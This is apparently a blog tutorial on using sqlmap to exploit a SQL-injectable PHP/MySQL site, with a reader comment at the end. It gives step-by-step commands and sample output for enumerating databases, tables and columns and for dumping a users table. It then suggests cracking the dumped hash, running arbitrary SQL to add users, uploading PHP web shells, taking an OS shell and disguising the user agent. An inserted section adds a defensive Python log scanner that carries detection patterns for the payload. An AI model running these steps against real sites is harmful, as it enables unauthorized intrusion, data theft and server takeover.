For the list of options and parameters that can be used with the sqlmap command, check the following URL
https://github.com/sqlmapproject/sqlmap/wiki/Usage
To understand this tutorial you should have a thorough understanding of how database-driven web applications work, for example those built with PHP and MySQL.
URLs
Let's say you have a URL like this
http://www.site.com/section.php?id=51
and that it is prone to SQL injection because the developer of that site did not properly escape the parameter id. This can be tested simply by trying to open the URL
http://www.site.com/section.php?id=51'
We just added a single quote to the parameter. If this URL throws an error, then it is clear that the database has reacted with an error because it received an unexpected single quote.
Hacking with sqlmap
Now it's time to move on to sqlmap to hack such URLs. The sqlmap command is run from the terminal with the Python interpreter.
$ python sqlmap.py -u "http://www.site.com/section.php?id=51"
The above is the first and simplest command to run with the sqlmap tool. It checks the URL and tries to discover basic information about the system. The output can look something like this
[*] starting at 12:10:33
[12:10:33] [INFO] resuming back-end DBMS 'mysql'
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
So the sqlmap tool has discovered the operating system, web server, and database along with version information. Even this much is pretty impressive. But it's time to move on and see what more this tool is capable of.
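As an added example (not part of the original article), here is a small Python detector that looks for the two signs described above in web server access logs: a non-numeric value in the id parameter (the single-quote test) and the markers of the MySQL error-based payload shown in the sqlmap output. The log lines, IP addresses and User-Agent strings are constructed; the only real-world assumption is that sqlmap's default User-Agent contains the string "sqlmap" unless --random-agent is used.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined access-log format (Apache/nginx default); fields we do not need are skipped.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Markers of sqlmap's "MySQL >= 5.0 AND error-based" payload, as seen in the article's output.
ERROR_BASED_TOKENS = ("FLOOR(RAND(0)*2)", "INFORMATION_SCHEMA", "GROUP BY")

# Constructed sample log (not from the original article): a normal request, the
# single-quote test (id=51%27), the error-based payload, and another normal request.
SAMPLE_LOG = r"""
203.0.113.5 - - [10/Mar/2024:12:10:30 +0000] "GET /section.php?id=51 HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:12:10:31 +0000] "GET /section.php?id=51%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:12:10:33 +0000] "GET /section.php?id=51%20AND%20(SELECT%201489%20FROM(SELECT%20COUNT(*),CONCAT(0x3a73776c3a,(SELECT%20(CASE%20WHEN%20(1489=1489)%20THEN%201%20ELSE%200%20END)),0x3a7a76653a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 500 340 "-" "sqlmap/1.7 (https://sqlmap.org)"
198.51.100.9 - - [10/Mar/2024:12:11:02 +0000] "GET /section.php?id=52 HTTP/1.1" 200 4790 "-" "Mozilla/5.0"
"""

def analyse_request(line):
    """Return the findings for one log line; an empty list means nothing suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    findings = []
    # parse_qs percent-decodes, so %27 becomes a literal single quote here.
    for value in parse_qs(urlsplit(m["path"]).query, keep_blank_values=True).get("id", []):
        if not value.isdigit():          # section.php expects an integer id
            findings.append("non-numeric id")
        normalised = " ".join(value.upper().split())
        if all(token in normalised for token in ERROR_BASED_TOKENS):
            findings.append("error-based payload")
    if findings and m["status"].startswith("5"):
        # A 5xx on a tampered id is the reaction the single-quote test looks for.
        findings.append("5xx response to tampered id")
    if "sqlmap" in m["ua"].lower():
        findings.append("sqlmap user-agent")
    return findings

def scan_log(text):
    """Map line number -> findings for every suspicious request in the log text."""
    report = {}
    for number, line in enumerate(text.strip().splitlines(), 1):
        findings = analyse_request(line)
        if findings:
            report[number] = findings
    return report
```

Running scan_log(SAMPLE_LOG) flags lines 2 and 3 only; the two normal requests produce no findings.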
Discover Databases
In this step, sqlmap is used to find out what databases exist on the target system. Again the command is very simple
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dbs
The output could be something like this
[*] starting at 12:12:56
[12:12:56] [INFO] resuming back-end DBMS 'mysql'
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics
This time the output contains the available databases list.
Find tables in the database
Now it's time to find out what tables exist in a particular database. Let's say the database of interest here is 'safecosmetics'
Command
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics
and the output can be something similar to this
[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
[11:55:22] [INFO] retrieved: acl_acl_seq
[11:55:24] [INFO] retrieved: acl_aco
[11:55:25] [INFO] retrieved: acl_aco_map
[11:55:26] [INFO] retrieved: acl_aco_sections
[11:55:28] [INFO] retrieved: acl_aco_sections_seq
...
Isn’t this amazing? Let’s get the columns of a particular table now.
Get columns of a table
Now that we have the list of tables, it would be a good idea to get the columns of an important table. Let's say the table is 'users' and it contains the username and password.
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users
The output can be something like this
[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text
[12:17:49] [INFO] retrieved: permission
[12:17:51] [INFO] retrieved: tinyint(4)
[12:17:52] [INFO] retrieved: email
[12:17:53] [INFO] retrieved: text
[12:17:54] [INFO] retrieved: system_home
[12:17:55] [INFO] retrieved: text
[12:17:57] [INFO] retrieved: system_allow_only
[12:17:58] [INFO] retrieved: text
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+
Now the columns are clearly visible.
Get data from the table
Now comes the most interesting part, extracting data from the table. The command would be
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users
The above command simply dumps the data of that table, much like the mysqldump command.
The output might look similar to this
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
The hash column seems to hold the password hash. Try cracking the hash and you will get the login details right away. Sqlmap also writes a CSV file containing the dumped data for easy analysis.
What Next?
Execute arbitrary sql command on the server
This is arguably the easiest thing to do on a server that is vulnerable to SQL injection. The --sql-query option takes an SQL query to execute. Things of interest would be to create a user in the users table, or maybe to modify the content of CMS pages.
Another option, --sql-shell, gives an SQL shell-like interface to run queries interactively.
Get inside the admin panel and play
If the website is running some kind of custom CMS that has an admin panel, it might be possible to get inside, provided you are able to crack the password retrieved in the database dump. Simple and short passwords can be broken simply by brute-forcing; long, complex passwords may not be breakable.
Check if the admin panel allows file uploads. If an arbitrary PHP file can be uploaded, you can have a lot of fun. The PHP file can contain shell_exec, system, exec, or passthru function calls that allow the execution of arbitrary system commands. PHP web shell scripts can be uploaded to do the same thing.
Shell on remote OS
You would do this to completely take over a server. Note that it is not as easy and trivial as the tricks above suggest. Sqlmap comes with an option called --os-shell that can be used to attempt to get a shell on the remote system, but it has many limitations.
According to the Sqlmap manual:
The most important privilege needed by the current database user is to write files through the database functions. This is absent in most cases. Hence this technique will rarely work.
Note
1. Sometimes sqlmap is unable to connect to the URL at all. You will see this when it gets stuck at the first task, "testing connection to the target url". In such cases, it's helpful to use the --random-agent option. This makes sqlmap send a valid user agent string, similar to the ones sent by a browser like Chrome or Firefox.
2. For URLs that are not in the form param=value (MVC-style URLs, for example), sqlmap cannot automatically tell where to inject.
In such cases, sqlmap needs to be told the injection point, marked with a *
http://www.site.com/class_name/method/43*/80
The above tells sqlmap to inject at the point marked by *
That’s all friends. Special thanks to silver moon for the article.
naserhatami says
Hi, I have a problem with my terminal. The output of checking the URL is something like this:
[21:55:03] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
What's the problem?